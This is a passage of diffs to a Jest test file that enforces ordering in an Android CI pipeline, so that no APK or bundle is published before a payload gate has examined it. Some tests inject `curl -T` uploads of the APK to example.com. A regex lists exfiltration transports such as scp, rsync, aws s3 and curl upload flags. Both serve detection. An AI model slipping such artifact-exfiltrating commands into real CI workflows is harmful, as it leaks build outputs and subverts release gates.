-  // The sharpest form: an APK published before the gate has run at all, by a
-  // step whose path names no file. Every rule read past it before it was
-  // classified as a publisher with an unresolvable path.
+  // An APK published before the gate has run at all, by a step whose path
+  // names no file.
   it('both rules catch a directory-path upload spliced above the gate', () => {
     const m = broken();
     const job = jobIn(m, 'ci.yml', 'build-android');
@@ -1398,9 +1531,7 @@ describe('each rule is capable of failing', () => {
     ]);
   });
 
-  // The classifier is an if-chain over a single step, so a step that is two
-  // publishers at once used to be reported as whichever came first — and the
-  // second one's path went with it.
+  // A step can be more than one publisher at once, and each one's paths count.
   it('classifies a step that is two publishers at once, not just the first', () => {
     const m = broken();
     const step = stepIn(
@@ -1443,6 +1574,15 @@ describe('each rule is capable of failing', () => {
     ['a Play upload', {run: 'bundle exec fastlane upload_android_alpha'}],
     ['a gh release upload', {run: `gh release upload v1.0.0 ${GATED_APK}`}],
     ['a tag push', {run: 'git push origin "v1.0.0"'}],
+    // GitHub does not read the expression case-sensitively, so neither may this.
+    [
+      'an upload under a capitalised Always()',
+      {
+        uses: 'actions/upload-artifact@v4',
+        with: {name: 'apk', path: GATED_APK},
+        conditional: 'Always()',
+      },
+    ],
   ])(
     'the gate-can-fail rule catches %s running under if: always()',
     (_l, s) => {
@@ -1458,7 +1598,7 @@ describe('each rule is capable of failing', () => {
           uses: '',
           with: {},
           ...s,
-          raw: {if: 'always()'},
+          raw: {if: s.conditional ?? 'always()'},
         }),
       );
 
@@ -1552,7 +1692,7 @@ describe('each rule is capable of failing', () => {
       'build-android',
       'Create dummy release keystore for CI',
     );
-    const entry = NON_PUBLISHERS.find(
+    const entry = ACCOUNTED_STEPS.find(
       candidate => candidate.step === 'Create dummy release keystore for CI',
     );
     appendRun(
@@ -1577,7 +1717,7 @@ describe('each rule is capable of failing', () => {
       'build_ios',
       'Build and upload iOS app',
     );
-    const entry = NON_PUBLISHERS.find(
+    const entry = ACCOUNTED_STEPS.find(
       candidate => candidate.step === 'Build and upload iOS app',
     );
     appendRun(step, `curl -T ${GATED_APK} https://example.com/`);
@@ -1633,6 +1773,155 @@ describe('each rule is capable of failing', () => {
       isBuildingJob(jobIn(m, 'release.yml', 'build_android'), m.lanes),
     ).toBe(true);
     expect(violationsOfOrdering(m)).toEqual([]);
+  });
+
+  /**
+   * The inversion, from both directions: a step nobody wrote down is refused
+   * whatever it does, and one that is written down still has to satisfy its
+   * own assertion.
+   */
+  it.each([
+    ['a shell command nothing recognises', {run: 'bash tools/ship.sh'}],
+    ['an action nothing recognises', {uses: 'some-org/do-things@v1'}],
+    ['an innocuous-looking one', {run: 'echo hello'}],
+  ])('an unaccounted %s in a building job is refused', (_label, fields) => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Something new',
+        run: '',
+        uses: '',
+        with: {},
+        raw: {},
+        ...fields,
+      }),
+    );
+
+    expect(violationsOfUnaccountedSteps(m)).toEqual([
+      expect.stringContaining('Something new'),
+    ]);
+  });
+
+  it('refuses an accounted step whose own assertion stops holding', () => {
+    const m = broken();
+    const step = stepIn(m, 'ci.yml', 'build-android', 'ccache statistics');
+    appendRun(step, `curl -T ${GATED_APK} https://example.com/`);
+    const entry = ACCOUNTED_STEPS.find(
+      candidate =>
+        candidate.workflow === 'ci.yml' &&
+        candidate.step === 'ccache statistics',
+    );
+
+    expect(entry.assert(step, jobIn(m, 'ci.yml', 'build-android'), m)).toBe(
+      false,
+    );
+  });
+
+  /**
+   * An indirect path in a shell command. The step names an artifact by way of
+   * a variable, a wildcard or a directory, so no filename can be read out of
+   * it — and a publisher whose bytes cannot be named is refused, rather than
+   * reported as having published nothing.
+   */
+  it.each([
+    ['a directory staged from a variable', 'gh release upload "v1.0.0" dist/'],
+    ['a wholly indirect argument', 'gh release upload "v$VERSION" "$ARTIFACT"'],
+    ['a wildcard expansion', 'gh release upload "v1.0.0" "$BUNDLE_DIR"/*.aab'],
+  ])('path identity refuses %s', (_label, run) => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Ship it',
+        run,
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
+
+    expect(violationsOfOrdering(m)).toEqual([]);
+    expect(violationsOfPathIdentity(m).length).toBeGreaterThan(0);
+  });
+
+  // A `run: |` block is one script, so a quoted string may span its lines.
+  it('does not lose a path to a quote opened on an earlier line', () => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    job.steps.push(
+      asParsed({
+        workflow: 'ci.yml',
+        job: 'build-android',
+        index: job.steps.length,
+        name: 'Publish with a multi-line note',
+        run: `gh release upload v1.0.0 --notes "What changed\n- see #862" ${GATED_APK}`,
+        uses: '',
+        with: {},
+        raw: {},
+      }),
+    );
+
+    expect(violationsOfPathIdentity(m)).toContainEqual(
+      expect.stringContaining('app-prod-release.apk'),
+    );
+  });
+
+  it.each([
+    ['using: node20', 'runs:\n  using: node20\n  main: index.js'],
+    ['using: docker', 'runs:\n  using: docker\n  image: Dockerfile'],
+    ['a composite with no steps', 'runs:\n  using: composite\n  steps: []'],
+    ['no runs block this reader understands', 'runs: {}'],
+  ])('refuses a composite it cannot walk: %s', (_label, source) => {
+    expect(shipsNothing(`name: probe\n${source}`)).toBe(false);
+  });
+
+  it.each([
+    ['set +eu', 'set +eu'],
+    ['set +ex', 'set +ex'],
+    ['set +eo pipefail', 'set +eo pipefail'],
+    ['a trailing command on one line', null],
+    ['a backgrounded gate awaited', null],
+    ['an ERR trap', "trap 'exit 0' ERR"],
+  ])('the gate-can-fail rule catches %s', (label, prefix) => {
+    const m = broken();
+    const gate = stepIn(
+      m,
+      'ci.yml',
+      'build-android',
+      'Verify the Android payload',
+    );
+    const invocation = gate.run.replace(/\\\n\s*/g, ' ').trim();
+    if (prefix) {
+      gate.run = codeOf(`${prefix}\n${invocation}`);
+    } else if (label === 'a trailing command on one line') {
+      gate.run = codeOf(`${invocation}; cat payload-report.txt`);
+    } else {
+      gate.run = codeOf(`${invocation} & wait`);
+    }
+
+    expect(violationsOfGateCanFail(m).length).toBeGreaterThan(0);
+  });
+
+  it('accepts the gate preceded by set -euo pipefail, and nothing else', () => {
+    const m = broken();
+    const gate = stepIn(
+      m,
+      'ci.yml',
+      'build-android',
+      'Verify the Android payload',
+    );
+    gate.run = codeOf(
+      `set -euo pipefail\n${gate.run.replace(/\\\n\s*/g, ' ').trim()}`,
+    );
+
+    expect(violationsOfGateCanFail(m)).toEqual([]);
   });
 
   it('the lane-split rule fails when the fastlane lanes are re-merged', () => {

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -171,29 +171,45 @@ function gateExamines(step) {
  * literal `.apk`/`.aab`, so a rule keyed on filenames would see nothing to
  * compare and skip the step entirely. It is refused instead: the gate cannot
  * be shown to have read bytes the parse cannot identify.
+ *
+ * `anyExpression` holds for a `with:` path field, where the whole value is the
+ * path and an expression therefore hides one. It is cleared for a shell
+ * command, where a `${{ }}` is as likely to be a tag, a secret or a token —
+ * `gh release create v1.0.0` publishes no binary at all — so only an
+ * expression sitting against an `.apk`/`.aab` names an artifact there.
  */
 const UNRESOLVED_PATH = '(a path this parse cannot resolve)';
 
-function reachesUnresolvedAndroidOutput(value) {
+function reachesUnresolvedAndroidOutput(value, {anyExpression = false} = {}) {
   const text = String(value ?? '');
   return (
     /build\/outputs/.test(text) ||
     (text.includes('*') && /\.(?:apk|aab)/.test(text)) ||
-    text.includes('${{')
+    /\$\{\{[^\n]*?\}\}[^\s"']*\.(?:apk|aab)/.test(text) ||
+    (anyExpression && text.includes('${{'))
   );
 }
 
 /** Every way this repository can put built bytes in front of someone. */
 function publisherOf(step, lanes) {
   const text = stepText(step, lanes);
-  const pathsOrUnresolved = field => {
-    const paths = artifactsIn(JSON.stringify(step.with));
+  // Applied to every publisher that names a path, not only the `uses:` ones:
+  // an unresolvable path leaves path identity with nothing to compare, and a
+  // vacuous rule reads exactly like a satisfied one.
+  const resolved = (source, options) => {
+    const paths = artifactsIn(source);
     if (paths.length > 0) {
       return paths;
     }
-    return reachesUnresolvedAndroidOutput(step.with[field])
+    return reachesUnresolvedAndroidOutput(source, options)
       ? [UNRESOLVED_PATH]
       : [];
+  };
+  const pathsOrUnresolved = field => {
+    const paths = artifactsIn(JSON.stringify(step.with));
+    return paths.length > 0
+      ? paths
+      : resolved(String(step.with[field] ?? ''), {anyExpression: true});
   };
   if (/^actions\/upload-artifact@/.test(step.uses)) {
     const paths = pathsOrUnresolved('path');
@@ -206,10 +222,10 @@ function publisherOf(step, lanes) {
     return null;
   }
   if (/upload_to_play_store/.test(text)) {
-    return {rule: 'play-upload', paths: artifactsIn(text)};
+    return {rule: 'play-upload', paths: resolved(text)};
   }
   if (/\bgh\s+release\s+(?:create|upload)/.test(step.run)) {
-    return {rule: 'gh-release-cli', paths: artifactsIn(step.run)};
+    return {rule: 'gh-release-cli', paths: resolved(step.run)};
   }
   if (gitPushArguments(step.run).length > 0) {
     return {rule: 'tag-push', paths: []};
@@ -1078,6 +1094,41 @@ describe('each rule is capable of failing', () => {
     expect(violationsOfOrdering(m)).toEqual([]);
     expect(violationsOfPathIdentity(m)).toEqual([
       expect.stringContaining(fragment),
+    ]);
+  });
+
+  // The command-line publishers name their paths as arguments rather than in a
+  // `with:` block, and the same spellings hide an artifact there. Ordering
+  // alone held these: it fires on position, so it fired before this too — the
+  // fix is that path identity stops being vacuous, which is what the second
+  // assertion in each case is for.
+  it.each([
+    ['gh release create', 'gh release create v1.0.0 dist/*.apk'],
+    [
+      'a fastlane play upload',
+      'bundle exec fastlane run upload_to_play_store aab:android/app/build/outputs/bundle/prodRelease/',
+    ],
+  ])('both rules catch %s naming no resolvable file', (_label, run) => {
+    const m = broken();
+    const job = jobIn(m, 'ci.yml', 'build-android');
+    const gate = job.steps.findIndex(isGateStep);
+    job.steps.splice(gate, 0, {
+      workflow: 'ci.yml',
+      job: 'build-android',
+      index: 0,
+      name: 'Publish the build output',
+      run,
+      uses: '',
+      with: {},
+      raw: {},
+    });
+    reindex(job);
+
+    expect(violationsOfOrdering(m)).toEqual([
+      expect.stringContaining('Publish the build output'),
+    ]);
+    expect(violationsOfPathIdentity(m)).toEqual([
+      expect.stringContaining('cannot resolve to a filename'),
     ]);
   });
 

--- a/scripts/__tests__/android-publish-ordering.test.js
+++ b/scripts/__tests__/android-publish-ordering.test.js
@@ -1,6 +1,7 @@
 const fs = require('fs');
 const path = require('path');
 const yaml = require('js-yaml');
+const {createHash} = require('crypto');
 
 /**
  * Nothing may ship an Android artifact that the payload gate has not examined.
@@ -85,6 +86,39 @@ function codeOf(text) {
       return line.slice(0, cut);
     })
     .join('\n');
+}
+
+/**
+ * A step's whole content, canonically. Every key is included — `env`,
+ * `working-directory`, `if`, `with`, `uses`, and any key GitHub adds later —
+ * because naming the ones that matter is the judgement this file has learned
+ * not to make. The script is the parsed one, so a comment edit is not a change
+ * and an edit to what runs always is.
+ */
+function digestOf(step) {
+  const canonical = value => {
+    if (Array.isArray(value)) {
+      return value.map(canonical);
+    }
+    if (value && typeof value === 'object') {
+      return Object.keys(value)
+        .sort()
+        .reduce((out, key) => {
+          out[key] = key === 'run' ? codeOf(value[key]) : canonical(value[key]);
+          return out;
+        }, {});
+    }
+    return value;
+  };
+  const {run: _raw, ...rest} = step.raw ?? {};
+  return createHash('sha256')
+    .update(
+      JSON.stringify(
+        canonical({...rest, run: step.run, uses: step.uses, with: step.with}),
+      ),
+    )
+    .digest('hex')
+    .slice(0, 12);
 }
 
 function parseLanes() {
@@ -179,10 +213,16 @@ function artifactsIn(text) {
   ];
 }
 
+/**
+ * One entry per `git push`, its arguments trimmed — including the empty string
+ * for a bare push. Dropping the empty entries loses the invocation itself, so a
+ * bare `git push` classified as nothing and `every(…)` over the result was
+ * vacuously true.
+ */
 function gitPushArguments(run) {
-  return [...run.matchAll(/git\s+push\b([^\n]*)/g)]
-    .map(match => match[1].trim())
-    .filter(Boolean);
+  return [...run.matchAll(/git\s+push\b([^\n]*)/g)].map(match =>
+    match[1].trim(),
+  );
 }
 
 function buildsAndroid(body) {
@@ -196,11 +236,13 @@ function publishesAndroid(body) {
 }
 
 function isBuildingJob(job, lanes) {
-  return job.steps.some(
-    step =>
-      /gradlew\s+[^\n]*\b(?:assemble|bundle)/i.test(step.run) ||
-      lanesInvokedBy(step, lanes).some(lane => buildsAndroid(lane.body)),
-  );
+  return job.steps.some(step => {
+    const script = step.run.replace(/\\\n\s*/g, ' ');
+    return (
+      /\b(?:gradlew|gradle)\b[^\n]*\b(?:assemble|bundle)/i.test(script) ||
+      lanesInvokedBy(step, lanes).some(lane => buildsAndroid(lane.body))
+    );
+  });
 }
 
 function isGateStep(step) {
@@ -231,6 +273,20 @@ const UNRESOLVED_PATH = '(a path this parse cannot resolve)';
  * `build/outputs` instead would leave `dist/`, `artifacts/` and
  * `android/app/release/` naming nothing and classifying as no publisher at all.
  */
+/**
+ * The uploads whose paths are known not to be build output. Small, pinned, and
+ * asserted disjoint from `build/outputs`: a concrete filename that is not an
+ * `.apk`/`.aab` is not thereby harmless — `tar czf out/x.tgz …/apk` produces
+ * one — so the parse vouches only for names written down here.
+ */
+const NON_ARTIFACT_UPLOADS = ['payload-report.txt', 'PocketPal.app.dSYM.zip'];
+
+/**
+ * A `with:` path field, split into what it names. The whole value is a path
+ * here — one per line, or one per list entry — so each token is an artifact
+ * this parse can name, a declared non-artifact upload, or something it cannot
+ * vouch for at all.
+ */
 function pathFieldNames(value) {
   const tokens = (
     Array.isArray(value) ? value : String(value ?? '').split('\n')
@@ -238,8 +294,7 @@ function pathFieldNames(value) {
     .map(token => String(token).trim())
     .filter(Boolean);
 
-  const names = [];
-  for (const token of tokens) {
+  return tokens.map(token => {
     const base = token.split('/').pop();
     const concrete =
       !token.includes('${{') &&
@@ -247,12 +302,15 @@ function pathFieldNames(value) {
       !token.endsWith('/') &&
       /\.[A-Za-z0-9]+$/.test(base);
     if (!concrete) {
-      names.push(UNRESOLVED_PATH);
-    } else if (/\.(?:apk|aab)$/.test(base)) {
-      names.push(base);
+      return {kind: 'unreadable', token};
     }
-  }
-  return [...new Set(names)];
+    if (/\.(?:apk|aab)$/.test(base)) {
+      return {kind: 'artifact', token: base};
+    }
+    return NON_ARTIFACT_UPLOADS.includes(base)
+      ? {kind: 'declared', token: base}
+      : {kind: 'undeclared', token: base};
+  });
 }
 
 /**
@@ -265,18 +323,15 @@ function pathFieldNames(value) {
  * bundle exactly also happens to sit under `build/outputs`.
  */
 function commandNames(text) {
-  const names = new Set();
+  const seen = new Map();
   for (const token of String(text ?? '').split(/[\s'"(),]+/)) {
     if (!token || /^[a-z][a-z0-9+.-]*:\/\//i.test(token)) {
       continue;
     }
-    // A word is a candidate path if it is shaped like one: a directory
-    // separator or a wildcard. Asking only about tokens that already spell
-    // `.apk` made an indirect path invisible rather than unresolvable. A bare
-    // `"$ARTIFACT"` is not caught here and does not need to be — it resolves
-    // to nothing, and a publisher that resolves to nothing is refused below.
-    const looksLikeAPath = token.includes('/') || /[*?]/.test(token);
-    if (!looksLikeAPath) {
+    // A word is a candidate path if it is shaped like one. A bare `"$ARTIFACT"`
+    // is not caught here and does not need to be: it resolves to nothing, and a
+    // publisher that resolves to nothing is refused.
+    if (!token.includes('/') && !/[*?]/.test(token)) {
       continue;
     }
     const base = token.split('/').pop();
@@ -285,15 +340,13 @@ function commandNames(text) {
       !/[*?]/.test(token) &&
       !token.endsWith('/') &&
       /\.[A-Za-z0-9]+$/.test(base);
-    if (concrete) {
-      if (/\.(?:apk|aab)$/.test(base)) {
-        names.add(base);
-      }
-      continue;
+    if (!concrete) {
+      seen.set(token, {kind: 'unreadable', token});
+    } else if (/\.(?:apk|aab)$/.test(base)) {
+      seen.set(base, {kind: 'artifact', token: base});
     }
-    names.add(UNRESOLVED_PATH);
   }
-  return [...names];
+  return [...seen.values()];
 }
 
 /**
@@ -306,17 +359,16 @@ function commandNames(text) {
 function publisherOf(step, lanes) {
   const text = stepText(step, lanes);
   const rules = [];
-  const paths = [];
-  const add = (rule, named) => {
+  const named = [];
+  const add = (rule, tokens) => {
     rules.push(rule);
-    paths.push(...named);
+    named.push(...tokens);
   };
 
+  // Unconditional, like the other four: declining to classify when no artifact
+  // can be read makes the empty-resolution refusal unreachable for this class.
   if (/^actions\/upload-artifact@/.test(step.uses)) {
-    const named = pathFieldNames(step.with.path);
-    if (named.length > 0) {
-      add('workflow-artifact', named);
-    }
+    add('workflow-artifact', pathFieldNames(step.with.path));
   }
   if (/^softprops\/action-gh-release@/.test(step.uses)) {
     add('github-release', pathFieldNames(step.with.files));
@@ -328,11 +380,25 @@ function publisherOf(step, lanes) {
     if (/\bgh\s+release\s+(?:create|upload)/.test(step.run)) {
       add('gh-release-cli', commandNames(step.run));
     }
-    if (gitPushArguments(step.run).length > 0) {
+    if (gitPushArguments(step.run).some(args => args !== '')) {
       add('tag-push', []);
     }
   }
-  return rules.length > 0 ? {rules, paths: [...new Set(paths)]} : null;
+  if (rules.length === 0) {
+    return null;
+  }
+  return {
+    rules,
+    paths: [
+      ...new Set(
+        named.filter(one => one.kind === 'artifact').map(one => one.token),
+      ),
+    ],
+    concerns: named.filter(
+      one => one.kind === 'unreadable' || one.kind === 'undeclared',
+    ),
+    declared: named.filter(one => one.kind === 'declared').length,
+  };
 }
 
 function obtainsAndroidOutput(step) {
@@ -354,7 +420,7 @@ function obtainsAndroidOutput(step) {
  * instead by naming no artifact.
  */
 const SENDS_BYTES_OUT =
-  /upload_to_|git push|gh\s+(?:release|api)|scp\s|rsync\s|aws s3/;
+  /upload_to_|git push|gh\s+(?:release|api)|scp\s|rsync\s|aws s3|(?:curl|wget)[^\n]*\s(?:-T\b|--upload-file|-F\b|--form|-d\b|--data|--post-file|-X\s*(?:POST|PUT))/;
 const MOVES_BYTES_AT_ALL = new RegExp(
   `${SENDS_BYTES_OUT.source}|\\bcurl\\b|\\bwget\\b`,
 );
@@ -383,159 +449,529 @@ const pushesOnlyTheBumpCommit = (step, job, m) =>
 const runsNoAndroidGradle = (step, job, m) => !isBuildingJob(job, m.lanes);
 
 /**
- * Every step of a building job that is neither the gate nor a publisher, plus
- * the steps outside those jobs that the suspicion net flags.
+ * Every step of a building job, and the steps outside them that the suspicion
+ * net flags. Nothing is exempt by what it is: the gate, the publishers and the
+ * allowlisted actions are all here, because being recognised as one of those
+ * was itself a way to stop being looked at.
  *
- * This list is the whole point of the design. Deciding whether a step publishes
- * by recognising what publishing looks like is a blacklist over free-form shell
- * and YAML, and it leaked in five consecutive spellings. The default is
- * inverted here: inside a job that builds Android, a step this list does not
- * account for is a **violation**, not a step nobody looked at. Recognising
- * every way to publish is impossible; enumerating the steps this repository
- * actually has is a page of text.
+ * Each row pins the step's **content**, so an edit inside an already-accounted
+ * step costs the same reviewed line that adding a step costs. The list of steps
+ * is closed, and so is what a step may contain. The assertions beside the rows
+ * stay as a second line of defence, but they are no longer what holds the
+ * property: they can refuse only the transports somebody thought of, and the
+ * digest refuses the rest.
  *
- * Each entry states why the step ships nothing and, beside it, the assertion
- * that goes red when that stops being true. A new step in a building job costs
- * a reviewed line here — the same price as a fourth building job.
+ * A row is `[workflow, job, step, digest, reason, assertion]`. A `null` digest
+ * marks a step outside the building jobs, where the content pin does not apply.
  */
+const STEP_ASSERTIONS = {
+  handlesNoArtifact,
+  buildsThenIsGated,
+  pushesOnlyTheBumpCommit,
+  carriesNoTransport,
+  isGateStep: step => isGateStep(step),
+  // No assertion of its own, and it says so rather than manufacturing one that
+  // cannot fail: a publisher is held by ordering and path identity, and by the
+  // content pin, which is what stops it growing a second publish beside the one
+  // it is here for.
+  publisher: null,
+  reportUpload: (step, _job, m) => {
+    const publisher = publisherOf(step, m.lanes);
+    return (
+      publisher !== null &&
+      publisher.paths.length === 0 &&
+      publisher.concerns.length === 0 &&
+      publisher.declared > 0
+    );
+  },
+  iosUpload: (step, job, m) =>
+    runsNoAndroidGradle(step, job, m) &&
+    namesNoAndroidArtifact(step, job, m) &&
+    m.lanes
+      .filter(lane => lane.origin === 'ios')
+      .every(lane => !publishesAndroid(lane.body)),
+  weblateUpload: (step, job, m) =>
+    runsNoAndroidGradle(step, job, m) && namesNoAndroidArtifact(step, job, m),
+  // Carries the action allowlist's own reason and assertion.
+  action: (step, job, m) => {
+    const entry = ALLOWED_ACTIONS[step.uses];
+    return Boolean(entry) && (!entry.assert || entry.assert(step, job, m));
+  },
+};
+
 const ACCOUNTED_STEPS = [
-  // release.yml / build_android
-  ...[
-    ['Maximize build space', 'frees disk before the toolchains install'],
-    ['Install dependencies', 'installs the JS dependency tree'],
-    [
-      'Derive the rnllama variant allowlist from the payload manifest',
-      'reads the manifest and exports a gradle property',
-    ],
-    ['Bump versions', 'rewrites the version in tracked files'],
-    ['Set up Android Keystore', 'writes the signing keystore'],
-    ['Create .env file', 'writes build configuration'],
-    [
-      'Verify the variant allowlist reached the llama.rn build',
-      'greps the build log for the declared variant list',
-    ],
-  ].map(([step, reason]) => ({
-    workflow: 'release.yml',
-    job: 'build_android',
-    step,
-    reason,
-    assert: handlesNoArtifact,
-  })),
-  {
-    workflow: 'release.yml',
-    job: 'build_android',
-    step: 'Commit and push version changes',
-    reason: 'pushes the version-bump commit; the tag is pushed after the gate',
-    assert: pushesOnlyTheBumpCommit,
-  },
-  {
-    workflow: 'release.yml',
-    job: 'build_android',
-    step: 'Build Android app',
-    reason: 'builds the artifacts the gate then examines in the same job',
-    assert: buildsThenIsGated,
-  },
-
-  // ci.yml / build-android
-  ...[
-    ['Maximize build space', 'frees disk before the toolchains install'],
-    ['Install Yarn', 'installs the package manager'],
-    ['Install dependencies', 'installs the JS dependency tree'],
-    [
-      'Derive the rnllama variant allowlist from the payload manifest',
-      'reads the manifest and exports a gradle property',
-    ],
-    ['Create dummy google-services.json for CI', 'writes a placeholder config'],
-    ['Create dummy .env file for CI', 'writes placeholder build configuration'],
-    ['Create dummy release keystore for CI', 'writes a throwaway signing key'],
-    ['ccache statistics', 'prints compiler cache counters'],
-    [
-      'Verify the variant allowlist reached the llama.rn build',
-      'greps the build log for the declared variant list',
-    ],
-  ].map(([step, reason]) => ({
-    workflow: 'ci.yml',
-    job: 'build-android',
-    step,
-    reason,
-    assert: handlesNoArtifact,
-  })),
-  {
-    workflow: 'ci.yml',
-    job: 'build-android',
-    step: 'Build Android Release',
-    reason: 'builds the artifact the gate then examines in the same job',
-    assert: buildsThenIsGated,
-  },
-  {
-    workflow: 'ci.yml',
-    job: 'build-android',
-    step: 'Verify prod APK has no automation-bridge code (DCE sanity check)',
-    reason: 'reads the built APK to assert what it does not contain',
-    // Names the APK by design, so only the transport half can hold here.
-    assert: carriesNoTransport,
-  },
-
-  // e2e-tests.yml / build-android
-  ...[
-    ['Install dependencies', 'installs the JS dependency tree'],
-    [
-      'Derive the rnllama variant allowlist from the payload manifest',
-      'reads the manifest and exports a gradle property',
-    ],
-    ['Create dummy google-services.json for CI', 'writes a placeholder config'],
-    ['Create dummy .env file for CI', 'writes placeholder build configuration'],
-    ['Create dummy release keystore for CI', 'writes a throwaway signing key'],
-    [
-      'Verify the variant allowlist reached the llama.rn build',
-      'greps the build log for the declared variant list',
-    ],
-  ].map(([step, reason]) => ({
-    workflow: 'e2e-tests.yml',
-    job: 'build-android',
-    step,
-    reason,
-    assert: handlesNoArtifact,
-  })),
-  {
-    workflow: 'e2e-tests.yml',
-    job: 'build-android',
-    step: 'Build Android E2E APK',
-    reason: 'builds the artifact the gate then examines in the same job',
-    assert: buildsThenIsGated,
-  },
-
-  // Outside the building jobs, where the suspicion net is what flags a step.
-  {
-    workflow: 'release.yml',
-    job: 'build_ios',
-    step: 'Build and upload iOS app',
-    reason: 'uploads to TestFlight; carries no Android payload',
-    // Not the transport half: the iOS lane legitimately runs
-    // `upload_to_testflight`, so naming no Android artifact is what can hold.
-    assert: (step, job, m) =>
-      runsNoAndroidGradle(step, job, m) &&
-      namesNoAndroidArtifact(step, job, m) &&
-      m.lanes
-        .filter(lane => lane.origin === 'ios')
-        .every(lane => !publishesAndroid(lane.body)),
-  },
-  {
-    workflow: 'ci.yml',
-    job: 'build-ios',
-    step: 'Build iOS Release',
-    reason: 'builds an iOS binary and transports nothing',
-    assert: handlesNoArtifact,
-  },
-  {
-    workflow: 'l10n-upload.yml',
-    job: 'upload',
-    step: 'Upload to Weblate',
-    reason: 'uploads src/locales/en.json to the translation service',
-    assert: (step, job, m) =>
-      runsNoAndroidGradle(step, job, m) && namesNoAndroidArtifact(step, job, m),
-  },
-];
+  [
+    'ci.yml',
+    'build-android',
+    'Check out code',
+    'ddb2f046a7c1',
+    'checks out the repository',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Maximize build space',
+    '4d41c4a237cd',
+    'frees disk before the toolchains install',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Set up Node.js',
+    '8f92aaf91be0',
+    'installs Node',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Cache node_modules',
+    'f4ef7d943135',
+    'restores the dependency cache',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Install Yarn',
+    '74f8204ffaff',
+    'installs the package manager',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Install dependencies',
+    'df124beeabda',
+    'installs the JS dependency tree',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Derive the rnllama variant allowlist from the payload manifest',
+    '27fd84e82e81',
+    'reads the manifest and exports a gradle property',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Cache llama.rn native build tree',
+    'a7690de26de0',
+    'restores the native build tree',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Set up JDK 17',
+    'bcb91f2c754f',
+    'installs the JDK',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Set up the Hexagon SDK',
+    'fb3527993437',
+    'fetches and verifies the Hexagon SDK',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Set up ccache',
+    '71c9892ff908',
+    'restores the compiler cache',
+    'action',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Create dummy google-services.json for CI',
+    'e15bdfd6f028',
+    'writes a placeholder config',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Create dummy .env file for CI',
+    '0752168128c6',
+    'writes placeholder build configuration',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Create dummy release keystore for CI',
+    'e2776b4eece8',
+    'writes a throwaway signing key',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Build Android Release',
+    '8edc74417d96',
+    'builds the artifact the gate then examines in the same job',
+    'buildsThenIsGated',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'ccache statistics',
+    '79d772e38080',
+    'prints compiler cache counters',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Verify the variant allowlist reached the llama.rn build',
+    '698e98dba6cc',
+    'greps the build log for the declared variant list',
+    'handlesNoArtifact',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Verify prod APK has no automation-bridge code (DCE sanity check)',
+    '507d08fb6e5b',
+    'reads the built APK to assert what it does not contain',
+    'carriesNoTransport',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Verify the Android payload',
+    'ea93b4c01dbd',
+    'is the payload gate itself',
+    'isGateStep',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Upload payload report',
+    'c9025c2bef53',
+    "uploads the gate's report, which is evidence about the artifact rather than the artifact",
+    'reportUpload',
+  ],
+  [
+    'ci.yml',
+    'build-android',
+    'Upload Android APK',
+    '74ec2ebad81a',
+    'publishes the checked APK as a workflow artifact',
+    'publisher',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Checkout',
+    'cf37721dff3e',
+    'checks out the repository',
+    'action',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Setup Java',
+    '3a5994f8db80',
+    'installs the JDK',
+    'action',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Setup Node.js',
+    '72f06927c12c',
+    'installs Node',
+    'action',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Install dependencies',
+    '1781a40fca38',
+    'installs the JS dependency tree',
+    'handlesNoArtifact',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Derive the rnllama variant allowlist from the payload manifest',
+    '27fd84e82e81',
+    'reads the manifest and exports a gradle property',
+    'handlesNoArtifact',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Set up the Hexagon SDK',
+    'fb3527993437',
+    'fetches and verifies the Hexagon SDK',
+    'action',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Create dummy google-services.json for CI',
+    '5b3655f75fe0',
+    'writes a placeholder config',
+    'handlesNoArtifact',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Create dummy .env file for CI',
+    'b1cbd6733e44',
+    'writes placeholder build configuration',
+    'handlesNoArtifact',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
+    'Create dummy release keystore for CI',
+    '59912466755b',
+    'writes a throwaway signing key',
+    'handlesNoArtifact',
+  ],
+  [
+    'e2e-tests.yml',
+    'build-android',
